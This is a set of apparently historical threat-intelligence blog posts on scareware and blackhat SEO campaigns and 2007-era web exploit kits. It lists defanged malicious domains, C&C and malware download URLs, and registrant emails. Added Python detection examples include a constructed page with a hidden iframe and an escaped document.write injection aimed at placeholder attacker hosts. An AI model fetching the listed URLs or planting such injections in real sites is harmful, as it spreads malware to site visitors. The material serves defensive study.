It's 2008 and I've recently stumbled upon a currently active malicious and fraudulent blackhat SEO campaign successfully enticing users into falling victim to fake security software, also known as scareware, including a variety of dropped fake codecs. The campaign relies largely on the acquisition of legitimate traffic through active blackhat SEO campaigns, in this particular case various North Korea news and Mike Tyson's daughter themed campaigns.

Related malicious domains and redirectors known to 
have participated in the campaign: 

hxxp://fi97.net
hxxp://is-the-boss.com - Email: dantsr@gmail.com

Related malicious domains known to have 
participated in the campaign: 

hxxp://north-korea-news.moviegator.us 

Related malicious domains known to have 
participated in the campaign: 

hxxp://petrenko.biz 

Related malicious domains known to have 
participated in the campaign: 

hxxp://teensxporn.com - 66.197.165.41 - Email: robertxssmith@googlemail.com
hxxp://aprettygirls.com
hxxp://analporntube.com
hxxp://tuexxxteen.com
hxxp://ltubexxx.com
hxxp://teenboobstube.com
hxxp://tubexxxteen.com



Related rogue YouTube accounts known to have 
participated in the campaign: 

hxxp://www.youtube.com/user/afohebac5ar
hxxp://www.youtube.com/user/irufupolOop

Related malicious domains known to have 
participated in the campaign: 

hxxp://get-mega-tube.com - 216.240.143.7
hxxp://my-flare-tube.com
hxxp://best-crystal-tube.com
hxxp://powerful-tube.com
hxxp://cheery-tube-portal.com
hxxp://jazzy-tubs.com
hxxp://video-tube-dot.com
hxxp://my-tube-show.com

Once executed, a sample malware phones back to the following malicious C&C server URLs:

hxxp://mgjmnfgbdfb.com/fff9999.php
hxxp://mgjmnfgbdfb.com/eee9999.php

Once executed, a sample malware also phones back to the following malicious C&C server URLs:

hxxp://imageempires.com/perce/9dc0266f8077f4b2cd9411ed48ecdda988af00003b1280c47e899830c09969686e8ccfe804c2a7ce5/c0a/perce.jpg
hxxp://imagescolor.com/item/adb0765f302764425d74c12df84cbd29185f9070bb2230a42e0958e050299908de1c5f0844c2579e3/20c/item.gif
hxxp://picturehappiness.com/werber/207/216.jpg
hxxp://archiveexefiles09.com/file.exe

Related malicious URLs known to have participated in
the campaign:

hxxp://archiveexefiles09.com/softwarefortubeview.45016.exe

Related malicious domains known to have participated in
the campaign:

hxxp://archiveexefiles09.com - 91.212.65.54
hxxp://exefilesstorage.com
hxxp://exearchstortage.com
hxxp://grandfilesstore.com
hxxp://arch-grandsoftarchive.com
hxxp://hex-programmers.com
hxxp://kir-fileplanet.com


We'll continue monitoring the campaign and post updates as 
soon as new developments take place. 

Historical OSINT - A Diversified Portfolio of Fake Security Software (2018-10-22 13:33)

It's 2010 and I've recently stumbled upon a currently active and circulating malicious and fraudulent portfolio of fake security software, also known as scareware, potentially enticing hundreds of thousands of users to a multitude of malicious software, with the cybercriminals behind the campaign potentially earning fraudulent revenue in the process of monetizing access to malware-infected hosts, largely relying on the utilization of an affiliate network-based type of revenue sharing scheme.

Related malicious domains known to have 
participated in the campaign: 

hxxp://thebest-antivirus00.com - 91.212.226.203; 94.228.209.195
hxxp://virusscannerpro0.com
hxxp://lightandfastscanner01.com
hxxp://thebest-antivirus01.com
hxxp://thebestantivirus01.com
hxxp://remove-spyware-11.com
hxxp://remove-virus-11.com
hxxp://thebest-antivirus11.com
hxxp://antispyware-module1.com
hxxp://antispywaremodule1.com
hxxp://antivirus-toolsr1.com
hxxp://thebest-antivirus1.com
hxxp://thebest-antivirusx1.com
hxxp://thebestantivirus02.com
hxxp://remove-spyware-12.com
hxxp://remove-virus-12.com
hxxp://delete-all-virus-22.com
hxxp://lightandfastscanner22.com
hxxp://prosecureprotection2.com
hxxp://virusscannerpro2.com
hxxp://antivirus-toolsr2.com
hxxp://thebest-antivirusx2.com
hxxp://thebestantivirus03.com
hxxp://remove-spyware-13.com
hxxp://remove-virus-13.com
hxxp://antispyware-module3.com
hxxp://antispywaremodule3.com
hxxp://virusscannerpro3.com
hxxp://windowsantivirusserver3.com
hxxp://thebest-antivirusx3.com
hxxp://thebestantivirus04.com
hxxp://remove-spyware-14.com
hxxp://remove-virus-14.com
hxxp://antispyware-scann4.com
hxxp://antivirus-toolsr4.com
hxxp://thebest-antivirusx4.com
hxxp://thebestantivirus05.com
hxxp://remove-all-spyware-55.com
hxxp://delete-all-virus-55.com
hxxp://thebest-antivirusx5.com
hxxp://remove-spyware-16.com
hxxp://lightandfastscanner66.com
hxxp://antispywaremodule6.com
hxxp://antispyware-module7.com
hxxp://antispywaremodule7.com
hxxp://antivirus-toolsr7.com
hxxp://antispyware-scann8.com
hxxp://pro-secure-protection8.com
hxxp://windowsantivirusserver8.com
hxxp://antispyware-module9.com
hxxp://antispywaremodule9.com
hxxp://antispyware-scann9.com
hxxp://virusscannerpro9.com
hxxp://antivirus-toolsr9.com
hxxp://thebest-antivirus9.com
hxxp://antiviruspro1scan.com
hxxp://antiviruspro2scan.com
hxxp://antiviruspro7scan.com
hxxp://antiviruspro8scan.com
hxxp://antiviruspro9scan.com
hxxp://antispyware6sacnner.com
hxxp://antivirusv1tools.com
hxxp://antispyware10windows.com
hxxp://antispyware20windows.com
hxxp://antivirus-toolsvv.com

hxxp://remove-spyware-11.com
hxxp://remove-virus-11.com
hxxp://remove-spyware-12.com
hxxp://remove-virus-12.com
hxxp://delete-all-virus-22.com
hxxp://prosecureprotection2.com
hxxp://remove-spyware-13.com
hxxp://remove-virus-13.com
hxxp://windowsantivirusserver3.com
hxxp://remove-spyware-14.com
hxxp://remove-virus-14.com
hxxp://remove-all-spyware-55.com
hxxp://delete-all-virus-55.com
hxxp://remove-spyware-16.com
hxxp://pro-secure-protection8.com
hxxp://windowsantivirusserver8.com
hxxp://antivirus-toolsr9.com
hxxp://antivirusv1tools.com
hxxp://antispyware10windows.com
hxxp://antispyware20windows.com
hxxp://antivirus-toolsvv.com

Related malicious domains known to have 
participated in the campaign: 

hxxp://run-antivirusscan0.com
hxxp://runantivirusscan0.com
hxxp://remove-spyware-11.com
hxxp://remove-virus-11.com
hxxp://run-virus-scanner1.com
hxxp://remove-spyware-12.com
hxxp://remove-virus-12.com
hxxp://delete-all-virus-22.com
hxxp://remove-spyware-13.com
hxxp://remove-virus-13.com
hxxp://runantivirusscan3.com
hxxp://run-virusscanner3.com
hxxp://remove-spyware-14.com
hxxp://remove-virus-14.com
hxxp://run-virusscanner4.com
hxxp://remove-virus-15.com
hxxp://remove-all-spyware-55.com
hxxp://delete-all-virus-55.com
hxxp://remove-spyware-16.com
hxxp://run-virus-scanner6.com
hxxp://run-virusscanner6.com
hxxp://runantivirusscan8.com
hxxp://run-virus-scanner8.com
hxxp://windowsantivirusserver8.com
hxxp://run-virus-scanner9.com
hxxp://run-virusscanner9.com

Related malicious domains known to have 
participated in the campaign: 

hxxp://run-antivirusscan0.com
hxxp://run-antivirusscan1.com
hxxp://run-antivirusscan3.com
hxxp://run-antivirusscan6.com
hxxp://run-antivirusscan8.com
hxxp://runantivirusscan0.com
hxxp://runantivirusscan3.com
hxxp://runantivirusscan4.com
hxxp://runantivirusscan9.com
hxxp://securepro-antivirus1.com

Related malicious domains known to have 
participated in the campaign: 

hxxp://anti-virus-system0.com
hxxp://run-antivirusscan0.com
hxxp://runantivirusscan0.com
hxxp://perform-antivirus-scan-1.com
hxxp://remove-spyware-11.com
hxxp://remove-virus-11.com
hxxp://antivirus-system1.com
hxxp://performspywarescan1.com
hxxp://run-virus-scanner1.com
hxxp://remove-spyware-12.com
hxxp://remove-virus-12.com
hxxp://delete-all-virus-22.com
hxxp://antivirus-scanner-3.com
hxxp://remove-spyware-13.com
hxxp://remove-virus-13.com
hxxp://runantivirusscan3.com
hxxp://run-virusscanner3.com
hxxp://remove-spyware-14.com
hxxp://remove-virus-14.com
hxxp://gloriousantivirus2014.com
hxxp://run-virusscanner4.com
hxxp://smart-pcscanner05.com
hxxp://remove-virus-15.com
hxxp://remove-all-spyware-55.com
hxxp://delete-all-virus-55.com
hxxp://perform-virus-scan5.com
hxxp://perform-antivirus-scan-6.com
hxxp://antivirus-scanner-6.com
hxxp://remove-spyware-16.com
hxxp://run-virus-scanner6.com
hxxp://run-virusscanner6.com
hxxp://antivirus-scan-server6.com
hxxp://perform-antivirus-scan-7.com
hxxp://perform-antivirus-test-7.com
hxxp://antivirus-win-system7.com
hxxp://antivirus-for-pc-8.com

Related malicious domains known to have 
participated in the campaign: 

hxxp://perform-antivirus-scan-8.com
hxxp://perform-antivirus-test-8.com
hxxp://run-antivirusscan8.com
hxxp://runantivirusscan8.com
hxxp://run-virus-scanner8.com
hxxp://windowsantivirusserver8.com
hxxp://perform-antivirus-test-9.com
hxxp://perform-virus-scan9.com
hxxp://antispywareinfo9.com
hxxp://run-virus-scanner9.com
hxxp://run-virusscanner9.com
hxxp://antispyware06scan.com
hxxp://antispywareinfo9.com
hxxp://antivirus-for-pc-2.com
hxxp://antivirus-for-pc-4.com
hxxp://antivirus-for-pc-6.com
hxxp://antivirus-for-pc-8.com
hxxp://antiviruspro8scan.com
hxxp://extra-antivirus-scan1.com
hxxp://extra-security-scanb1.com
hxxp://run-antivirusscan0.com
hxxp://run-antivirusscan1.com
hxxp://run-antivirusscan3.com
hxxp://run-antivirusscan6.com
hxxp://run-antivirusscan8.com
hxxp://runantivirusscan0.com
hxxp://runantivirusscan3.com
hxxp://runantivirusscan4.com
hxxp://runantivirusscan9.com
hxxp://securepro-antivirus1.com
hxxp://super-scanner-2004.com
hxxp://top-rateantivirus0.com
hxxp://topantimalware-scanner7.com

We'll continue monitoring the campaign and post updates as
soon as new developments take place.

Historical OSINT - A Diversified Portfolio of Fake
Security Software Spotted in the Wild (2018-10-22 13:40)

It's 2010 and I've recently stumbled upon yet another malicious
and fraudulent domain portfolio serving a variety of fake
security software, also known as scareware, potentially exposing
hundreds of thousands of users to it, with the cybercriminals
behind the campaign potentially earning fraudulent revenue
largely by relying on an affiliate-network based type of
revenue-sharing scheme.

Related malicious domains known to have 
participated in the campaign: 

hxxp://50virus-scanner.com
hxxp://700virus-scanner.com
hxxp://antivirus-test66.com
hxxp://antivirus200scanner.com
hxxp://antivirus600scanner.com
hxxp://antivirus800scanner.com
hxxp://antivirus900scanner.com
hxxp://av-scanner200.com
hxxp://av-scanner300.com
hxxp://av-scanner400.com
hxxp://av-scanner500.com
hxxp://inetproscan031.com
hxxp://internet-scan020.com
hxxp://novirus-scan00.com
hxxp://stopvirus-scan11.com
hxxp://stopvirus-scan13.com
hxxp://stopvirus-scan16.com
hxxp://stopvirus-scan33.com
hxxp://virus66scanner.com
hxxp://virus77scanner.com
hxxp://virus88scanner.com
hxxp://antivirus-scan200.com
hxxp://antispy-scan200.com
hxxp://av-scanner200.com
hxxp://av-scanner300.com
hxxp://antivirus-scan400.com
hxxp://antispy-scan400.com
hxxp://av-scanner400.com
hxxp://av-scanner500.com
hxxp://antivirus-scan600.com
hxxp://antispy-scan600.com
hxxp://antivirus-scan700.com
hxxp://antispy-scan700.com
hxxp://av-scanner700.com
hxxp://antispy-scan800.com
hxxp://antivirus-scan900.com
hxxp://novirus-scan00.com
hxxp://stop-virus-010.com
hxxp://spywarescan010.com

Related malicious domains known to have 
participated in the campaign: 

hxxp://antispywarehelp010.com
hxxp://internet-scan020.com
hxxp://internet-scanner020.com
hxxp://insight-scan20.com
hxxp://internet-scanner030.com
hxxp://stop-virus-040.com
hxxp://internet-scan040.com
hxxp://insight-scan40.com
hxxp://internet-scan050.com
hxxp://internet-scanner050.com
hxxp://insight-scan60.com
hxxp://stop-virus-070.com
hxxp://internet-scan070.com
hxxp://internet-scanner070.com
hxxp://insight-scan80.com
hxxp://stop-virus-090.com
hxxp://internet-scan090.com
hxxp://internet-scanner090.com
hxxp://insight-scan90.com
hxxp://antispywarehelpk0.com
hxxp://inetproscan001.com
hxxp://novirus-scan01.com
hxxp://spyware-stop01.com
hxxp://antivirus-inet01.com
hxxp://stopvirus-scan11.com
hxxp://inetproscan031.com
hxxp://novirus-scan31.com
hxxp://antivirus-inet31.com
hxxp://novirus-scan41.com
hxxp://antivirus-inet41.com
hxxp://antivirus-inet51.com
hxxp://inetproscan061.com
hxxp://novirus-scan61.com

Related malicious domains known to have 
participated in the campaign: 

hxxp://inetproscan081.com
hxxp://novirus-scan81.com
hxxp://inetproscan091.com
hxxp://spyware-stopb1.com
hxxp://spyware-stopm1.com
hxxp://spyware-stopn1.com
hxxp://spyware-stopz1.com
hxxp://antispywarehelp002.com
hxxp://antispywarehelp022.com
hxxp://novirus-scan22.com
hxxp://antispywarehelpk2.com
hxxp://insight-scanner2.com
hxxp://spywarescan013.com
hxxp://stopvirus-scan13.com
hxxp://novirus-scan33.com
hxxp://stopvirus-scan33.com
hxxp://antispywarehelp004.com
hxxp://antispywarehelpk4.com
hxxp://spywarescan015.com
hxxp://novirus-scan55.com
hxxp://insight-scanner5.com
hxxp://stopvirus-scan16.com
hxxp://stopvirus-scan66.com
hxxp://antispywarehelpk6.com
hxxp://spywarescan017.com
hxxp://insight-scanner7.com
hxxp://antispywarehelp008.com
hxxp://spywarescan018.com
hxxp://stopvirus-scan18.com
hxxp://novirus-scan88.com
hxxp://stopvirus-scan88.com
hxxp://antivirus-test88.com
hxxp://antispywarehelpk8.com
hxxp://insight-scanner8.com
hxxp://insight-scanner9.com

Related malicious domains known to have 
participated in the campaign: 

hxxp://10scanantispyware.com
hxxp://20scanantispyware.com
hxxp://30scanantispyware.com
hxxp://60scanantispyware.com
hxxp://80scanantispyware.com
hxxp://2scanantispyware.com
hxxp://3scanantispyware.com
hxxp://5scanantispyware.com
hxxp://7scanantispyware.com
hxxp://8scanantispyware.com
hxxp://spyware200scan.com
hxxp://spyware500scan.com
hxxp://spyware800scan.com
hxxp://spyware880scan.com
hxxp://50virus-scanner.com
hxxp://90virus-scanner.com
hxxp://antivirus900scanner.com
hxxp://antivirus10scanner.com
hxxp://virus77scanner.com
hxxp://virus88scanner.com
hxxp://net001antivirus.com
hxxp://net011antivirus.com
hxxp://net111antivirus.com
hxxp://net021antivirus.com
hxxp://net-02antivirus.com
hxxp://net222antivirus.com
hxxp://net-04antivirus.com
hxxp://net-05antivirus.com
hxxp://net-07antivirus.com

We'll continue monitoring the campaign and post updates as
soon as new developments take place.
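
The domain lists in this post and the preceding one share a small number of naming templates: a fixed prefix and suffix around a changing number (remove-virus-NN.com, av-scannerNNN.com and so on). The following is an added example, not code from the post or its author, showing how a defender can refang such a list, group it by template and compile one detection pattern for DNS or proxy logs. The sample list is a constructed subset of the domains above; the function names are this example's own.

```python
import re
from collections import defaultdict

# Constructed sample input: a subset of the defanged domains listed in the post
# (the blog's "hxxp://" convention), kept short so the grouping is easy to follow.
SAMPLE_IOCS = [
    "hxxp://remove-spyware-13.com",
    "hxxp://remove-virus-13.com",
    "hxxp://remove-spyware-14.com",
    "hxxp://remove-virus-14.com",
    "hxxp://run-antivirusscan0.com",
    "hxxp://run-antivirusscan3.com",
    "hxxp://runantivirusscan3.com",
    "hxxp://av-scanner200.com",
    "hxxp://av-scanner300.com",
    "hxxp://av-scanner400.com",
    "hxxp://perform-antivirus-scan-6.com",
]


def refang(ioc):
    """Turn a defanged URL or host (hxxp://, hxxps://, [.]) into a bare lowercase hostname."""
    s = ioc.strip().lower().replace("[.]", ".").replace("(.)", ".")
    s = re.sub(r"^(?:hxxps?|https?)://", "", s)
    return s.split("/", 1)[0].split("?", 1)[0]


def skeleton(host):
    """Collapse every digit run to '#' so that templated names share one key."""
    return re.sub(r"\d+", "#", host)


def cluster(iocs):
    """Group hostnames by skeleton; returns {skeleton: [hosts...]}."""
    groups = defaultdict(list)
    for ioc in iocs:
        host = refang(ioc)
        groups[skeleton(host)].append(host)
    return dict(groups)


def skeleton_to_regex(skel):
    """Escape the literal parts and put a digit class back where the numbers were."""
    return r"\d+".join(re.escape(part) for part in skel.split("#"))


def campaign_pattern(iocs, min_members=2):
    """Compile one anchored regex covering every skeleton seen at least min_members times.
    Singletons are left out on purpose: one sample is not evidence of a template."""
    alts = sorted(skeleton_to_regex(s) for s, hosts in cluster(iocs).items()
                  if len(hosts) >= min_members)
    return re.compile(r"^(?:" + "|".join(alts) + r")$")


def matches_campaign(host, pattern):
    """True when a (possibly defanged) host fits one of the campaign's naming templates."""
    return pattern.match(refang(host)) is not None


if __name__ == "__main__":
    for skel, hosts in cluster(SAMPLE_IOCS).items():
        print(f"{len(hosts):2d}  {skel}")
    pat = campaign_pattern(SAMPLE_IOCS)
    print(pat.pattern)
    for probe in ("remove-virus-99.com", "av-scanner800.com", "example.com"):
        print(probe, matches_campaign(probe, pat))
```

The min_members threshold is the important knob: a template backed by two or more observed domains is worth a log search, while a singleton such as perform-antivirus-scan-6.com stays an exact-match indicator rather than becoming a wildcard that could sweep in unrelated names.
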

Historical OSINT - Massive Blackhat SEO Campaign
Spotted in the Wild Serves Scareware (2018-10-22 14:05)

It's 2010 and I've recently stumbled upon a currently active
and circulating malicious and fraudulent blackhat SEO campaign
successfully enticing hundreds of thousands of users globally
into interacting with a multitude of rogue and malicious
software, also known as scareware.

In this post I'll profile the campaign, discuss in-depth the
tactics, techniques and procedures of the cybercriminals behind
it, and provide actionable intelligence on the infrastructure
behind it.

Related malicious domains known to have 
participated in the campaign: 

hxxp://ozeqiod.cn?uid=213 - redirector - 64.86.25.201 -
hxxp://bexwuq.cn

Sample URL redirection chain: 

hxxp://ymarketcoms.cn/?pid=123

Related malicious domains known to have responded
to the same malicious C&C server IPs (64.86.25.201):

hxxp://bombas101.com
hxxp://trhtrtrbtrtbtb.com
hxxp://opensearch-zone.com
hxxp://imaera.cn
hxxp://ariexa.cn
hxxp://ozeqiod.cn
hxxp://ariysle.cn
hxxp://ajegif.cn
hxxp://adiyki.cn
hxxp://acaisek.cn
hxxp://yvamuer.cn
hxxp://protectinstructor.cn
hxxp://blanshinblansh.net
hxxp://kostinporest.net

Related malicious domains known to have
participated in the campaign:

hxxp://azikyxa.cn
hxxp://befaqki.cn
hxxp://ataini.cn
hxxp://atoycri.cn
hxxp://bimpuj.cn
hxxp://bekajop.cn
hxxp://bexwuq.cn
hxxp://azywoax.cn
hxxp://azaijy.cn

We'll continue monitoring the campaign and post updates as
soon as new developments take place.

Historical OSINT - Malicious Economies of Scale - The
Emergence of Efficient Platforms for Exploitation -
2007 (2018-10-22 16:23)

Dear blog readers, it's been several years since I last posted a
quality update following my [1]2010 disappearance. As it's been
quite a significant period of time since I last posted a quality
update, I feel it's about time I post one by detailing the Web
malware exploitation market segment circa 2007, prior to my visit
to the GCHQ as an independent contractor with the [2]Honeynet
Project.

In this post I'll discuss the rise of Web malware exploitation
kits circa 2007 and offer an in-depth discussion of the current
and emerging tactics, techniques and procedures (TTPs) of the
cybercriminals behind them. With cybercriminals continuing to
actively rely on the exploitation of patched and outdated
vulnerabilities, and with end users continuing to actively
utilize unpatched and outdated third-party software, it
shouldn't be surprising that today's botnets remain relatively
easy to generate and orchestrate for the purpose of committing
financial fraud.

Malicious Economies of Scale literally means utilizing attack
techniques and exploitation approaches to efficiently, yet cost
and time effectively, infect or abuse as many victims as
possible, in combination with an added layer of improved metrics
on the success of the campaigns. What are the most popular web
exploitation kits that malicious parties use to achieve this?
Which are the most popular vulnerabilities used in the majority
of the kits? What are the most popular techniques for embedding
malware? This white paper will outline this efficiency-centered
attack model, and will cover web application vulnerabilities,
client-side vulnerabilities, malvertising and black hat SEO
(search engine optimization).

It offers an overview of the threats posed by the rising number
of malware-embedded sites, with a discussion of the exploitation
techniques and kits used, as well as detailed summaries of all
the high-profile such attacks during 2007.

01. Reaching the Efficiency Scale Through a Diverse
Set of Exploited Vulnerabilities

2007 was the year in which client-side vulnerabilities
significantly replaced server-side ones as the preferred choice
of malicious attackers on their way to achieving the highest
possible attack success rate, while keeping their investment in
terms of know-how and personal effort to the minimum. Among the
most successful such attacks during 2007 was Storm Worm, the
perfect example that the use of outdated and already patched
vulnerabilities can result in aggregating the world's largest
botnet, according to industry and independent researchers'
estimates. By itself, this attack technique is in direct
contradiction with the common wisdom that zero day
vulnerabilities are more dangerous than already patched ones;
however, the gang behind Storm Worm quickly recognized this
biased statement as false, and by standardizing the exploitation
process with the help of outdated vulnerabilities achieved an
enormous success.

Years ago, whenever a vulnerability was found and exploit code
released in the wild, malicious attackers used to quickly release
a do-it-yourself exploitation kit to take advantage of a single
exploit only. Nowadays, that's no longer the case, since by using
a single exploit, whether an outdated or a zero day one, they're
significantly limiting the probability of a successful attack,
and therefore the more diverse and served on-the-fly the set of
exploits used in an attack, the higher the success rate would be.

What was even more interesting to monitor during 2007 was the
rise of high-profile sites serving malware, and the decline of
malware coming from bogus ones. From the [3]Massive Embedded
Malware Attack at a large Italian ISP to the Bank of India, the
Syrian Embassy in the U.K., the U.S. Consulate in St. Petersburg,
China's CSIRT, Possibility Media's entire portfolio of E-zines,
to the French government's site related to Libya, these trusted
web sites were all found to serve malware through an embedded
link pointing back to the attacker's malicious server. Let's
clarify what malicious economies of scale means, and how they do
it.

02. What is malicious economies of scale, and how is
it achieved?

Malicious economies of scale is a term I coined in 2007 to
summarize the ongoing trend of efficiently attacking online
users by standardizing the exploitation process, and by doing
so, not just lowering the entry barriers into the process of
exploiting a large number of users, but also maintaining a
rather static success rate of infections.

Malicious economies of scale is the efficient way by which a
large number of end users get infected, or have their online
activity abused, with the malicious parties maintaining a static
attack model. It's perhaps more important to also describe how
the process is achieved in the first place. The first strategy
applied has to do with common sense in respect to the most
popular software applications present at the end user's end, and
the first touch-point in this case would be the end user's
Internet browser.

Having its version easily detected and an exploit served, one
that's directly matching the vulnerable version, is among the
web exploitation kits' main functionalities. Let's continue with
the second strategy, namely to increase the probability of
success. As I've already pointed out, do-it-yourself single
vulnerability exploiting tools matured into web exploitation
malware kits, now backed up with a diverse set of exploits
targeting different client-side applications, which in this
case is the process of increasing the probability of successful
infection. The third strategy has to do with attracting the
traffic to the malicious server, which as I've already discussed
is already automatically set to anticipate the upcoming flood of
users and serve the malware through exploiting client-side
software vulnerabilities on their end. This is mainly done
through exploiting remote file inclusion vulnerabilities within
the high-profile targets, or through remotely exploitable web
application vulnerabilities, to basically embed a single line of
code, or an obfuscated JavaScript that when deobfuscated will
load the malicious URL in between loading the legitimate site.
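
To make the last point concrete from the defender's side, the following is an added example (not the author's code) of the check a site owner can run over fetched HTML: a small scanner that flags the two injection styles described above, a zero-size or CSS-hidden iframe pointing off-site and an unescape()-wrapped document.write() blob that only becomes such an iframe once decoded. The page, the site name news.example and the .invalid hosts are constructed for the example, and the scanner decodes only percent-escapes (not JavaScript's %uXXXX form).

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse

# Hypothetical legitimate site whose pages are being checked (constructed name).
SITE_HOST = "news.example"

# Constructed sample page: the site's own markup plus two injected payloads of the
# kinds described above: a zero-size iframe pointing off-site, and an escaped
# document.write() blob that builds a second hidden iframe only when the script runs.
SAMPLE_PAGE = """<html><head><title>Example News</title>
<script src="/static/app.js"></script></head><body>
<h1>Headlines</h1>
<iframe src="http://attacker.invalid/in.cgi?3" width="0" height="0" style="display:none"></iframe>
<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A%2F%2Fexploit.invalid%2Fmp%2F%22%20width%3D0%20height%3D0%3E%3C%2Fiframe%3E'))</script>
<p>Story text.</p>
</body></html>"""

HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
# JavaScript unescape('...') with a single percent-encoded string literal inside.
UNESCAPE_CALL = re.compile(r"unescape\(\s*['\"]([^'\"]*)['\"]\s*\)", re.I)


def off_site(url, site_host):
    """True when the URL names a host outside site_host and its subdomains."""
    host = urlparse(url).hostname
    return bool(host) and host != site_host and not host.endswith("." + site_host)


def looks_hidden(attrs):
    """Zero/one-pixel frames or CSS-hidden ones: no legitimate reason to embed a third party that way."""
    return (attrs.get("width") in ("0", "1") or attrs.get("height") in ("0", "1")
            or bool(HIDDEN_STYLE.search(attrs.get("style", ""))))


class InjectionScanner(HTMLParser):
    """Collects (kind, url_or_snippet) findings while walking the page."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "script":
            self._in_script = True
            if a.get("src") and off_site(a["src"], self.site_host):
                self.findings.append(("external-script", a["src"]))
        elif tag == "iframe":
            src = a.get("src", "")
            if src and off_site(src, self.site_host) and looks_hidden(a):
                self.findings.append(("hidden-offsite-iframe", src))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Inline script bodies arrive here as raw text (HTMLParser treats <script> as CDATA).
        if self._in_script:
            for m in UNESCAPE_CALL.finditer(data):
                decoded = unquote(m.group(1))  # %XX only; JS %uXXXX is not handled here
                if re.search(r"<(iframe|script)\b", decoded, re.I):
                    self.findings.append(("escaped-injection", decoded))
                    # Run the decoded markup through the same checks as the static page.
                    self.findings.extend(scan_page(decoded, self.site_host))


def scan_page(html, site_host):
    """Return the list of findings for one HTML document."""
    scanner = InjectionScanner(site_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


if __name__ == "__main__":
    for kind, detail in scan_page(SAMPLE_PAGE, SITE_HOST):
        print(f"{kind:24s} {detail}")
```

Run as a script it lists both hidden iframes plus the decoded document.write() payload; the same-origin /static/app.js is not reported. The useful property for a defender is that the decoded blob is checked with exactly the same rules as static markup, so an obfuscation layer does not earn the injected frame a pass.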

Popular Malware Embedded Attack Tactics

This part of the article will briefly describe some of the most
common attack tactics malicious parties use to embed links to
their malicious servers on either high-profile sites, or any
other site with a high pagerank, something they've started
measuring as of recently, according to threat intel assessment
of an automated system that embeds links based on a site's
popularity.



• The "pull" Approach - Blackhat SEO, Harnessing the
Trusted Audience of a Hacked Site

In this tactic, malicious parties entirely rely on the end users
to reach their malicious server, compared to the second tactic
of "pushing" the malicious links to them. This is primarily
accomplished through the use of Blackhat SEO tools generating
junk content with the idea of successfully attracting search
engine traffic for popular queries, thus infecting anyone who
visits the site, which often appears within the first twenty
search results. The second such "pull" approach is harnessing
the already established trust of a site, such as a major news
portal for instance, and by embedding a link that automatically
loads on the portal, having the users actually "pull" the
malware for themselves.

• The "push" Approach - Here's Your Malware
Embedded Link

The "push" approach's success lies in its simple logic: with end
users still worrying about downloading or clicking on email
attachments, given the overall lack of understanding of how to
protect from sites serving malware, it's logical to consider
that basically sending a link which, once visited, will
automatically infect the visitor through exploiting a
client-side vulnerability actually works. Storm Worm is the
perfect example, and to demonstrate what malicious economies of
scale means once again, it's worth mentioning Storm's approach
of having an already infected host act as an infection vector
itself, compared to its authors having to register multiple
domains and change them periodically. The result is malware
embedded links exploiting client-side vulnerabilities in the
form of an IP address, in this case an already infected host
that's now aiming to infect another one.

• Automatically Exploiting Web Application
Vulnerabilities - Mass SQL Injection Attacks

As I've already pointed out, malicious parties are not just
efficiently scanning for remotely exploitable web application
vulnerabilities or looking for ways to remotely include files on
any random host; they've started putting effort into analyzing
the page rank and overall popularity of a site they could
exploit. This prioritizing of the sites to be used for a "pull"
tactic aims to achieve the highest possible success rate by
targeting a highly trafficked site, where even though the attack
can be detected, the "window of opportunity" while the users
were also accessing the malicious server could be far more
beneficial than having a permanent malware link on a less
popular site for an indefinite period of time.

• Malicious Advertisements - Malvertising

Among the most popular traffic acquisition tactics nowadays
remains the active utilization of legitimate Web properties for
the purpose of socially engineering an ad network provider into
featuring a specific malware-serving advertisement at the
targeted Web site, including active Web site compromise for the
purpose of injecting rogue and malicious ads on the targeted
host.

Related posts:

• [4]Historical OSINT - Malicious Malvertising Campaign,
Spotted at FoxNews, Serves Scareware

• [5]Cybercriminals Launch Malicious Malvertising Campaign,
Thousands of Users Affected

• [6]Managed SWF Injection Cybercrime-friendly Service
Fuels Growth Within the Malvertising Market Segment

• Buying Access to Hacked Cpanels or Web Servers

Thanks to a vibrant DIY (do-it-yourself) Web malware
exploitation kit culture, including the active utilization of
various DIY Web site exploitation and malware-generating tools,
cybercriminals continue actively utilizing stolen and
compromised accounting data for the purpose of injecting
malicious scripts on the targeted host, further compromising the
confidentiality, availability and integrity of the targeted
host.

• Harvesting accounting data from malware infected
hosts



Having administrator access to a domain portfolio, or any type
of access through a web application backdoor or direct FTP/SSH,
reached its commercial level a long time ago. In fact,
differentiated pricing applies in this case, on the basis of a
site's page rank, and I've stumbled upon great examples of
"underground goods liquidity" as a process, where access to a
huge domain portfolio through hacked Cpanels is being offered
for cents, with the seller's main concern being that cents are
better than nothing, nothing in the sense that she may lose
access to the Cpanel before it is sold and thus end up with
nothing. Now, let's discuss the most popular malware
exploitation kits currently in the wild.

The Most Popular Web Malware Exploitation Kits

Going into detail about the most common vulnerabilities used in
the multitude of web malware exploitation kits could be
irrelevant from the perspective of their current state of
"modularity"; that is, once the default installation of the kit
contains a rather modest set of exploits, the possibility to add
new exploits to be used has long reached the point'n'click
stage. Even worse, localizing the kits to different languages
further contributes to their ease of use and acceptance on a
large scale, just as their open source nature makes it easy for
coders to use a successful kit's modules as a foundation for a
new one, something that's happening already, namely the
difference between a copycat kit and an original one coded from
scratch. Among the most popular malware kits remain:

• A Brief Overview of MPack, IcePack, Zunker,
Advanced Pack and Fire Pack

During 2007, MPack emerged as the most popular malware
exploitation kit. Originally available for purchase, by the time
copies of the kit started leaking out, anyone from a script
kiddie to a pragmatic attacker had obtained a copy of it.
MPack's main strength is that of its well configured default
installation, which in combination with a rather modest, but
then again modular, set of exploits included, as well as its
point'n'click level of sophistication, automatically turned it
into the default malware kit. MPack has been widely used in
nearly all of the high-profile malware embedded attacks during
2007; however, its popularity resulted in way too much industry
attention towards its workings, and therefore malicious parties
started coming up with new kits, still using MPack as the
foundation, at least from a theoretical perspective.

The list is endless: the Nuclear Malware kit, Metaphisher, old
versions of the WebAttacker and the Rootlauncher kit, with the
latest and most advanced innovation named the Random JS
Exploitation Kit. Compared to the previous ones, this one goes a
step beyond the usual centralized malicious server.

